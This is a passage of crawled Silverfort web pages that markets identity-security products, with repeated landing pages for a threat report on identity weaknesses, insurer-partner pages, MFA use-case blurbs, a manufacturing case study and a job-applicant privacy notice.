defenses. But below the known identity attack surface exists an underground world of Identity Threat Exposures (ITEs): misconfigurations, forgotten user accounts, legacy settings, and insecure built-in features. These ITEs are attackers’ inside collaborators, offering an easy path to access credentials, escalate privileges, and move laterally, both on-prem and in the cloud. The Identity Underground is the first ever threat report 100% focused on the prevalence of identity security gaps – using Silverfort’s own proprietary data. The goal of this report is to provide you with insight into the identity security weaknesses you may not be aware of and empower you to make informed decisions on where to invest in identity security. Highlights of this report include: 67% of organizations expose their SaaS apps to compromise with insecure on-prem password sync. 37% of all user accounts authenticate via the weakly encrypted NTLM protocol, providing attackers easy access to cleartext passwords. 1 AD misconfiguration = 109 new shadow admins (on average). 31% of user accounts are service accounts – yet only 20% of companies are confident they can protect service accounts. And more --- - Published: 2024-04-10 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-sompo-customers/ Welcome Sompo Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2024-03-26 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-identity-underground-report-google-ppc/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-26 - Modified: 2024-09-11 - URL: https://www.silverfort.com/the-identity-underground-report-li-ppc/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-22 - Modified: 2024-09-13 - URL: https://www.silverfort.com/the-identity-underground-report-thn-li/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-19 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-rh/ What is your identity protection challenge? Fill out this form and we’ll contact you to schedule an online or on-site demo. window. addEventListener("message", (ev) => { if (ev. data. type === 'hsFormCallback' && ev. data. eventName === 'onFormReady') { window. hero = new RevenueHero({ routerId: '1251' }) hero. schedule('hsForm_6432a41a-4dc5-45c9-8419-971d96121c55') } }); --- - Published: 2024-03-18 - Modified: 2024-10-03 - URL: https://www.silverfort.com/the-identity-underground-report/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/job-applicant-privacy-policy/ Effective Date: March 13, 2024 This Privacy Notice explains how Silverfort, Inc. and its subsidiaries (collectively, “we,” “our,” or “us”) collects, uses, discloses, and otherwise processes personal information about our recruits and job applicants.   This Privacy Notice is not a contract and does not create any legal rights or obligations. This Privacy Notice also is not intended to replace other notices or disclosures we may provide to you in connection with your application for a job or eventual role in our organization, which will supersede any conflicting disclosures contained in this Privacy Notice.   What is Personal Information? When we use the term “personal information” in this Privacy Notice, we mean information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, to you within the context of you acting as a job applicant. It does not include aggregated or deidentified information that is maintained in a form that is not capable of being associated with or reasonably linked to you. Our Collection of Personal Information During the recruiting process and when you apply for a job with us, we collect personal information about you, which may include:  Contact Information: such as your full name, email address, home address and telephone number.   Professional History & Qualifications: such as your previous employers, positions and work experience, professional licenses, certificates or other qualifications, and employment references or referrals. Educational History & Qualifications: such asyour highest level of education, the schools you attended and when you were in attendance, degrees, certificates or other educational qualifications you earned, and your transcripts or educational references.   Financial Information: such as your desired salary, bonus, benefits, expenses, and stock or equity grants.   Background Check Information: when permitted by applicable law, we may choose to conduct a background check in connection with your application such as to verify professional and educational history and qualifications or identify criminal history that may be relevant for a position with us. The results of the background check may include personal information we do not already have about you.   Equal Opportunity Information: such as age, race, ethnicity, national origin, citizenship, sex, gender identity, sexual orientation, religion, disability or accommodation request, or marital or veteran status when you choose to provide it, but it will not be used in the hiring decision.   Web-Related Information: such as technical details (including IP addresses) about your visit to our online services contained in log files or analytics data relating to your usage and activity on our online services. For more information, please refer to the general Privacy Policy on our website.   Other Application and Interview Information: any personal information you choose to share with us in your interview or application, CV, resume, transcripts or other supporting documentation.   Inferences: We may generate inferences or predictions about recruits and job applicants and their abilities, interests, or preferences based on the other personal information we collect and the interactions we have with them. Although we often collect the personal information described above directly from you, we may also collect certain information from references, recruiters, job-related social media sites (such as LinkedIn), and publicly available sources. In addition, we may also collect this information through service providers and other third parties that collect it on our behalf, such as communications providers, scheduling providers and application providers.   Our Use of Personal Information We use the personal information we collect during the recruiting process and when you apply for a job with us to:  Identify you as a potential candidate and review your application for a position with us;  Verify the information provided to us in connection with your application or received from other sources;  Determine your eligibility and suitability for the potential position or other opportunities with us;  Facilitate the recruiting and interview process;  Communicate with you about the status of your application or other opportunities with us that may be of interest to you; Assess and improve the performance and success of our recruiting and hiring process; Conduct internal investigations, audits, compliance, risk management, problem resolution and security operations;  Fulfill contractual obligations to you and other third parties;  Comply with applicable law, rule, regulation, legal proceeding and government investigations, including relating to tax reporting and immigration.   Please note that if you accept an offer from us, we may transfer the personal information we collected about you during the recruiting and job application process to your personnel file with us. We may also process deidentified information that cannot reasonably be used to infer information about, or otherwise be linked to, a particular consumer or household. We commit to maintain and use the information in deidentified form and will not attempt to reidentify the information, except in instances where necessary for determining whether the deidentification process used by us satisfies the requirements under applicable law. Disclosure of Personal Information We may share your personal information with the following third parties for the purposes described below:  Within the Company:We share personal information relating to recruits and job applicants within our family of companies for internal administrative purposes and uses that are consistent with this Privacy Notice. For example, the entity responsible for the job posting may share personal information about an applicant with another entity that is responsible for our organization-wide recruiting and employment decisions. Recruiters and Job Application Providers: We often engage recruiters and job application providers to assist us in identifying potential job applicants and processing job applications we receive. In order for these third parties to assist us in the recruiting and job application process, we share personal information about potential and current personnel with them.   Other Service Providers: In addition to the third parties identified above, we engage other third parties to perform certain functions on our behalf in connection with the uses of personal information described in the Our Collection and Use of Personal information section above, including assisting us with our recruiting process, personnel management, benefits and services offerings, and other related business operations. Depending on the function the third party serves, the service provider may process personal information on our behalf or have access to personal information while performing functions on our behalf.   Business Transaction or Reorganization:We may take part in or be involved with a corporate business transaction, such as a merger, acquisition, joint venture, or financing or sale of company assets. We may disclose personal information to a third-party during negotiation of, in connection with or as an asset in such a corporate business transaction. Personal information may also be disclosed in the event of insolvency, bankruptcy, or receivership. Legal Obligations and Rights:We may disclose personal information to third parties, such as legal advisors and law enforcement:in connection with the establishment, exercise, or defense of legal claims; to comply with laws and regulations or to respond to lawful requests and legal process; to protect our rights and property and the rights and property of our agents, customers, and others, including to enforce our agreements, policies, and terms of use;to detect, suppress, or prevent fraud; to reduce credit risk and collect debts owed to us; to protect the health and safety of us, our customers, or any person; or  as otherwise required by applicable law. Otherwise with Consent or Direction:We may disclose personal information about our recruits and applicants with your consent or direction. In addition, some jurisdictions have different or specific legal requirements governing the use of personal information. We will comply with all laws and regulations, including local data protection laws, and will implement additional procedures and policies wherever needed to meet these requirements. Your personal information will be accessible in the country where we or our service providers are located, the UK, the US, Israel, and countries deemed as providing an adequate level of data protection. No Sales or Targeted Advertising We do not sell personal information about individuals in connection with job applicants, and we do not share or otherwise disclose personal information about individuals acting in their capacity as job applicants to third parties for the purpose of displaying advertisements that are selected based on personal information obtained or inferred over time from an individual’s activities across businesses or distinctly-branded websites, applications, or other services (otherwise known as “targeted advertising” or “cross-context behavioral advertising”). Data Retention We retain personal information only for as long as is reasonably necessary to fulfil the purpose for which it was collected. However, if necessary, we may retain personal information for longer periods of time, until set retention periods and deadlines expire, for instance where we are required to do so in accordance with legal, tax, and accounting requirements set by a legislature, regulator, or other government authority. To determine the appropriate duration of the retention of personal information, we consider the amount, nature, and sensitivity of the personal information, the potential risk of harm from unauthorized use or disclosure of personal information, and if we can attain our objectives by other means, as well as our legal, regulatory, tax, accounting, and other applicable obligations.   Once retention of the personal information is no longer necessary for the purposes outlined above, we will either delete or deidentify the personal information or, if this is not possible (for example, because personal information has been stored in backup archives), then we will not further process the personal information until deletion or deidentification is possible. Your Privacy Rights We use the personal information we collect during the recruiting process and when you apply for a job with us to:  If you are California resident, you may be able to exercise the following rights in relation to the personal information that we have collected about you (subject to certain limitations at law): The Right to Access/Know. The right to confirm whether we are processing personal information about you and, under California law only, to obtain certain personalized details about the personal information we have collected about you, including:The specific pieces of personal information we have collected about you;The categories of personal information collected;The categories of sources of the personal information;The purpose for which the personal information were collected;The categories of personal information that we have disclosed to third parties for a business purpose, and the categories of recipients to whom this information was disclosed;The categories of personal information shared for cross-context behavioral advertising purposes (if any), and the categories of recipients to whom the personal information were disclosed for those purposes; and The categories of personal information we have sold or shared about you (if any), and the categories of third parties to whom the information was sold or shared. The Right to Request Deletion. You have the right to request the deletion of personal information we have collected from you, subject to certain exceptions. The Right to Correction. You have the right to request that any inaccuracies in your personal information be corrected, taking into account the nature of the personal information and the purposes of the processing of your personal information. The Right to Limit Use and Disclosure of Sensitive Personal Information.  You have the right to direct us to limit the use of your sensitive personal information to certain purposes, including to perform the services reasonably expected. The Right to Control Over Automated Decision-Making/Profiling. The right to direct us not to use automated decision-making or profiling for certain purposes. You also have the right to not receive retaliatory or discriminatory treatment in connection with a request to exercise the above rights. However, please note that if the exercise of these rights limits our ability to process personal information, we may no longer be able to engage with you in the same manner. Submitting Privacy Rights Requests To submit a request to exercise one of the privacy rights identified above, please submit a request by emailing privacy@silverfort. com. Before processing your request, we will need to verify your identity and confirm you are a resident of a jurisdiction with a privacy right noted above. In order to verify your identity, we will generally either require the successful authentication of your work-related account, or... --- - Published: 2024-03-13 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-critical-assets/ Elevate your security with Silverfort MFA – the ultimate solution to protect all your critical assets. This agentless MFA solution is meticulously crafted to safeguard critical systems from identity-based threats, significantly diminishing the risk of unauthorized access. Leveraging Silverfort’s cutting-edge risk-based authentication and adaptable policies, user access is securely managed, allowing seamless authentication from any device, regardless of location or network. Silverfort’s platform enables a cohesive MFA strategy across diverse systems, enhancing overall security posture while minimizing administrative burdens. Explore the advantages of Silverfort’s MFA solution and fortify your security defenses today. --- - Published: 2024-03-13 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-aws-cli/ Authenticate access to your AWS CLI with Silverfort’s Agentless MFA solution --- - Published: 2024-03-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/an-osterman-research-report-the-state-of-the-identity-attack-surface-secweek-23/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2024-03-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-chubb-customers/ Welcome Chubb Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. Learn More About the Silverfort Platform Disclaimer: The non-insurance products and services described herein are provided by Silverfort, a third-party vendor not affiliated with Chubb. The fact that offers and potential discounts may be made available by this third party vendor is not an indication that insurance coverage is available under any Chubb policy for any particular incident. Referenced discounts on products and services offered by Silverfort are available only to Chubb policyholders with current in-force policies and are subject to applicable insurance laws. For products and services provided, the policyholder and third party vendor would enter into a vendor relationship directly. Chubb will not be involved in the policyholder’s decision to purchase services and has no responsibility for services that may be provided. --- - Published: 2024-03-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-cyberclan-customers/ Welcome CyberClan Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. Learn More About the Silverfort Platform --- - Published: 2024-03-01 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-partners-referral/ Silverfort ensures full compliance with all MFA requirements of cyber insurance policies by enabling MFA for all on-prem and cloud resources without the need for agents or proxies. With Silverfort, you can: Gain full visibility of all admin users Apply MFA protection on all admin access, including directory services, networking infrastructure, and command-line access Discover, monitor and protect every service account in your environments Identify active identity threats Complete this form and one of our cyber insurance experts will be in touch. --- - Published: 2024-02-16 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-manufacturing/ Manufacturing Identity security for manufacturing. Secure every dimension of identity—from third-party access to hybrid environments to legacy applications. Get a demo or Take a platform tour Strengthening protection for legacy applications and systems. “Silverfort is helping us to secure and protect over 50 legacy manufacturing servers with RDP access, which is protected with MFA. Silverfort is not only providing MFA protection, they are also giving us actionable insights about threat detection into each authentication request. ” Fabian Jura, IT Infrastructure Manager, STARCO The challenge As STARCO scaled its business operations globally, it needed to implement more security controls across its environments. They sought to protect access to domain controllers via RDP, privileged access and service accounts. Our solution Within hours, STARCO had deployed MFA protection across all their resources and users, including admins and other privileged users. With the addition of fully automated visibility and protection of their service accounts, they knew they were securing every dimension of their identity. Secure every dimension of identity Securing the identity attack surface. Silverfort enables manufacturers to overcome the inherent risks of extensive third-party access and legacy apps and infrastructure, and become resilience to unauthorized access and ransomware propagation MFA to legacy applications Enforce MFA access policies on all your AD mission-critical applications that you can’t migrate to the cloud, across all local and remote access methods. Third-party access control Apply least privileged access policies on your external contractors and software providers, and monitor closely their access patterns to detect any sign of compromise. Identity security for OT Enhance the separation between the OT and IT zones with identity- based segmentation and secure the service accounts that manage the flow of operational data from the shopfloor to the analytics layer. Secure your operations and data. Extend MFA to legacy applications Extend your existing MFA solution to legacy applications that weren’t natively supported. This enables Silverfort to protect them with MFA, regardless of whether the application supports MFA. Read more Secure third-party access Silverfort does not require the installation of agents on protected devices, enabling it to easily enforce MFA on access attempts to any resource, including ones made by external vendors. Read more Protect hybrid environments Silverfort’s integration with all IdPs enables it to monitor and analyze every user’s full authentication trail context and extend MFA to the entire on-prem environment, including resources that couldn’t be protected before. Read more Extend your existing MFA solution to legacy applications that weren’t natively supported. This enables Silverfort to protect them with MFA, regardless of whether the application supports MFA. Read more Silverfort does not require the installation of agents on protected devices, enabling it to easily enforce MFA on access attempts to any resource, including ones made by external vendors. Read more Silverfort’s integration with all IdPs enables it to monitor and analyze every user's full authentication trail context and extend MFA to the entire on-prem environment, including resources that couldn’t be protected before. Read more Take a platform tour Learn more Explore blog --- - Published: 